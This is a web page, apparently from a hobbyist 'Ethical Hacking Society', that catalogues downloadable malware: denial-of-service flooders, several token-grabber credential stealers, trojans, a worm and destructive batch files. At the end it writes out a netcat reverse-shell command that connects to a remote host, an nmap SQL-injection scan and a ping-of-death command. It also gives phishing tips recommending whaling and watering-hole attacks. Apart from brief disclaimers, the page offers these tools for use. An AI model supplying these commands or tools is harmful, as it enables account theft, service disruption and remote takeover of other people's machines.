Ethical Hacking Society




View pop-up format

Disclaimer

We do not take responsibility for any damage, or legal issues, done with these files here at AT Products LLC, Ethical Hacking Society, The Script Community, CodingHome, or Noodle Hackerspace.
Use a virtual machine, and never open them on your physical machine. As a pre-caution, download them on your VM.

More information on Virtual Machines (VM)


Dark Web

Disclaimer

Even though The Dark Web is all legal, please be careful so you dont do illegal activity. So we aren't taking any responsibility for legal issues or damage done, even at AT Products, Ethical Hacking Society, CodingHome, or The Script Community.

Visit these links at your own risk, scammers and weirdos are common!

Use the Onion Browser, or the Tor Browser to browse the dark web.

The links in bold may not work correctly, so the ones that aren't in bold have been tested out and worked 100% correctly. Note that the Dark Web Pug's Guide has more links.



Denial of Service

TSC's DoS Section

A denial-of-service (DoS) attack is a type of cyber attack in which a malicious actor aims to render a computer or other device unavailable to its intended users by interrupting the device's normal functioning. DoS attacks typically function by overwhelming or flooding a targeted machine with requests until normal traffic is unable to be processed, resulting in denial-of-service to addition users. A DoS attack is characterized by using a single computer to launch the attack.

HTTP Flooder (Python) by Nasus

Requirements (TXT) MHViP (Python) README (MD). These files are a private paid DDPS


Distributed Denial of Service

A distributed denial-of-service (DDoS) attack is a type of DoS attack that comes from many distributed sources, such as a botnet DDoS attack.

SaphryaDDOS (Python) Ping of Death (Python) UDP Flood (Python) by CobraCommander


Token Grabbers

Token Grabber (Python) by Alex Toucan

Token Grabber (Python) by wodxgod

Token Grabber (Python) by Wever

Token Grabber (7Z) Token Grabber (Python) by CobraCommander

Token Grabber (Python) by CУБΞЯC

Token Bruteforcer (Python) by Social404

Wever Recommends these steps

Token Grabber.js ss-grabber.js Tutorial


Trojans

From The Script Community: A Trojan horse in cybersecurity is any malware that misleads users of its true intent. It may look legitimate but can take control of your computer. A Trojan is designed to damage, disrupt, steal, or in general inflict some other harmful action on your data or network.

MEMZ Trojan (ZIP | Python) Trojan 1 (BAT) Trojan 2 (BAT) Trojan 3 (BAT) Trojan 4 (BAT) Trojan 5 (BAT) by CobraCommander


Worms

Networm (TXT) by CobraCommander


Other

Doom (EXE) Techno (BAT) VirusCodes (TXT) Doom (BAT | Version 2) Unknown (BAT) Death (BAT) Crash (BAT) Unknown (BAT) Matrix (TXT) Script (BAT) Pinger and DDOS (RAR) MyDOOM_3 by CobraCommander

Reverse Shell Command on Netcat - nc -e /bin/sh 10.0.0.1 1234

Nmap on Kali Linux SQL Injection - nmap --script=http-sql-injection <target>

Ping of Death in “C” - ping -t |65500

Social Engineering - "Spearhead phishing is effective but try something like whaling or watering hole" See Phishing Defintions